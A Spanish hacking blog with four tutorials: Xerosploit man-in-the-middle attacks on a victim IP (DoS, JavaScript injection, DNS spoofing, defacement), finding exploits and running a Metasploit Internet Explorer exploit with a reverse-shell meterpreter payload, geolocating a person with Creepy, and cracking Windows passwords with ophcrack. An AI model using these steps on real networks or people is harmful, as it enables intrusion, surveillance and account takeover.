viernes, 25 de noviembre de 2016

Xerosploit, un framework para ataques mitm

Hola amigos,

Hoy os traigo un framework para ataques MITM, que es capaz de hacer:
  • Escaneo de puertos
  • Mapeo de red.
  • Ataques DOS.
  • Inyección HTML
  • Inyección JAVA
  • Interceptación y sustitución de descargas.
  • Snifar tráfico.
  • DNS spoofing.
  • Reproducción de audio de fondo.
  • Reemplazamiento de imágenes.
  • Etc.
Nos lo podemos descargar de la página https://github.com/LionSec/xerosploit



Una vez descargado descomprimimos

unzip xerosploit-master.zip



./install.py



Elegimos la instalación. Como lo voy a instalar en Kali, pulso 1; sin embargo, si lo fuese a instalar en parrot OS (que por cierto, también está muy bien), sería la 2.





Para ejecutar, ponemos

xerosploit

Si damos a help, nos muestra los comandos disponibles




Si ponemos scan



Ponemos la IP víctima



Nos pregunta que qué módulo queremos cargar. Para ello nos dice que pongamos help para ver los mismos.

help

Los módulos que tiene son:

  • pscan: Escanea puertos.
  • dos: Ataque DOS.
  • ping: Pues eso.
  • Injecthtml: Inyecta código html.
  • injectjs: Inyecta javascript.
  • rdownload: reemplaza ficheros que están siendo descargados.
  • sniff: Esnifea los paquetes.
  • dspoof: Redirige todo el tráfico http a una determinada IP.
  • yplay: Reproduce en segundo plano un sonido en el navegador víctima.
  • move: mueve el contenido del navegador web. Es como si alguien del más allá estuviese moviendo la barra de desplazamiento.
  • deface: Reescribe todas las páginas con tu propio código.
  • driftnet: Capturamos las imágenes que le lleguen.
  • replace: Reemplaza las imágenes de una página web por la que tú quieras.

Pondremos el nombre del módulo y presionamos intro.

Cuando acabemos, pulsamos CTRL+C

Y para volver hacia atrás, ponemos back

Por ejemplo, si ponemos

replace

run

Ponemos el directorio de la imagen que queremos inyectar.

Y el resultado es el siguiente: Cuando vaya, por ejemplo, a la web http://www.perpetuosocorro.org/ , en lugar de ver:


Verá:



Por supuesto, que sólo la página le sale así a la víctima, en ningún momento se sustituye nada en la página web original.

Para salir,

exit

Happy hacking !!!!!!!!!!

No me hago responsable del mal uso de esta herramienta.

Sígueme en twitter: @manugomez1977 instagram: manugomez1977 Facebook:facebook.com/Manugomez1977

Para poder seguir haciendo posts, es necesario que hagas click en la publi. No te cuesta nada.


viernes, 18 de noviembre de 2016

Cómo buscar exploits

Hola Amigos.

En este post vamos a ver cómo podemos conseguir exploits que no están en nuestro metasploit.

En primer lugar, nos vamos a la web de exploitdb https://www.exploit-db.com



Tenemos la opción de buscar los tipos de exploit.



En el apartado shellcode nos encontramos las shells para los distintos S.O.



Podemos ver también distintos papers sobre seguridad, en la opción con el mismo nombre.



Con la opción Google Hacking Database podemos buscar dorks para google.



Vamos a usar el siguiente exploit remoto para android




Como podéis ver, tenemos el código CVE-2016-3861. Los códigos CVE identifican cada una de las vulnerabilidades de manera única, así podemos buscar una vulnerabilidad concreta con su respectivo código CVE.

El código CVE está compuesto de CVE-AÑO_DESCUBRIMIENTO-Nº_IDENTIFICATIVO



En la pestaña buscar, podemos buscar exploits concretos,, vamos a buscar exploits para windows 7.



Si no queremos demostrar que no somos robots con los captchas, nos podemos descargar la aplicación actualizada (aunque ya la tiene kali, pero es mejor descargarla) de



Esta versión se actualiza cada semana, para ello, hay que actualizarla:

./searchsploit -u

Con la opción -w nos muestra los exploits de la página exploitdb con su respectivo enlace

Cada uno de los exploits están en su código fuente, por lo que, tras descargarlos, habría que compilarlos si fuese necesario.

Para evitar que los script kiddies que se creen que los saben todo hagan el tonto con los exploits, los desarrolladores suelen poner errores en el código, así que lo más seguro es que haya que editarlo y corregirlo, y por supuesto, compilarlo.

En algunos casos, si están en ruby, podemos añadirlos a metasploit.

Nos descargamos el siguiente exploit


Una vez descargados

mv 28682.rb /usr/share/metasploit-framework/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb

Daos cuenta que el directorio principal de metasploit es /usr/share/metasploit-framework/.

En metasploit lo cargaríamos como siempre

use exploit/windows/browser/ie_setmousecapture_uaf

set SRVHOST 192.168.1.134

set SSL true

set URIPATH /

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.134

exploit

Sígueme en mis redes sociales:
  • facebook: facebook.com/Manugomez1977
  • twitter manugomez1977
  • instagram: manugomez1977

Por favor, haz click en la publi para poder seguir subiendo posts.

Muchas gracias.




viernes, 11 de noviembre de 2016

Tutorial creepy

En Kali linux ya tenemos instalado creepy, pero no la versión más reciente. Lo actualizaremos:

apt-get remove --purge creepy

Le decimos que Sí.



apt-get autoremove

Le decimos que sí.



pip install -U pytz python-qt flickrapi python-instagram yapsy tweepy google-api-python-client python-dateutil configobj dominate



Descargamos el código fuente de https://github.com/jkakavas/creepy/tarball/master

Descomprimimos

tar xvfz jkakavas-creepy-show-2-ga861ee.tar.gz



Nos vamos al subdirectorio creepy



chmod +x CreepyMain.py



./CreepyMain.py



Edit --> Plugins Configuration



Elegimos Flickr, Google +, Instagram o Twitter y le damos a Run Configuration Wizard

Seguimos las instrucciones.



Ok.


Creamos un nuevo proyecto: Creepy --> New proyect --> Person based proyect



Le ponemos el nombre del proyecto y le damos a siguiente.

En search for ponemos la persona a buscar.

Seleccionamos el objetivo y le damos a "Add To Targets"

Next



Next

Y Finish

Botón derecho en el proyecto -> Analyze Current Proyect

Veremos las localizaciones dibujadas en el mapa.

Evidentemente, no poner más imágenes, por privacidad.

No utilices esta información con fines ilegales.

Sígueme en las redes sociales:

  • Twitter: @manugomez1977
  • Instagram: manugomez1977
  • Facebook: facebook.com/Manugomez1977
Happy hacking ;-)


viernes, 4 de noviembre de 2016

Tutorial ophcrack

Hola amigos.

Hace tiempo, un amigo me pidió ayuda con un ordenador, pero tenía un problema: Se le había olvidado la contraseña.

Desde entonces, se me ocurrió hacer un post de cómo podemos recuperar la contraseña.

En primer lugar, nos vamos a la página ophcrack.sourceforge.net



Tenemos dos opciones:

La primera de ellas nos permite descargar el programa para nuestro sistema operativo (ya viene incluído en Kali Linux) para poder después, conectar el disco duro que contiene el sistema cuya contraseña queremos recuperar.

La segunda, nos permite descargar una iso para arrancar desde el pc donde tenemos el problema. Sin embargo, en ella hay otras dos opciones de descarga: para windows xp y para windows vista-7.

Otra opción es descargar sin rainbow tables, pero no os lo aconsejo, pues utiliza estas tablas para crackear la contraseña.



Yo utilizaré el segundo método.



En cuanto arranque, se pondrá manos a la obra



En el caso que pueda, nos sacará la contraseña, depende de las contraseñas de las tablas.

Para apagarlo, no hay que hacer más que darle al botón y seleccionar halt



Happy Hacking.

Por favor. Haz click en la publi.

Sígueme:

  • facebook /Manugomez1977
  • twitter: @manugomez1977
  • instagram: manugomez1977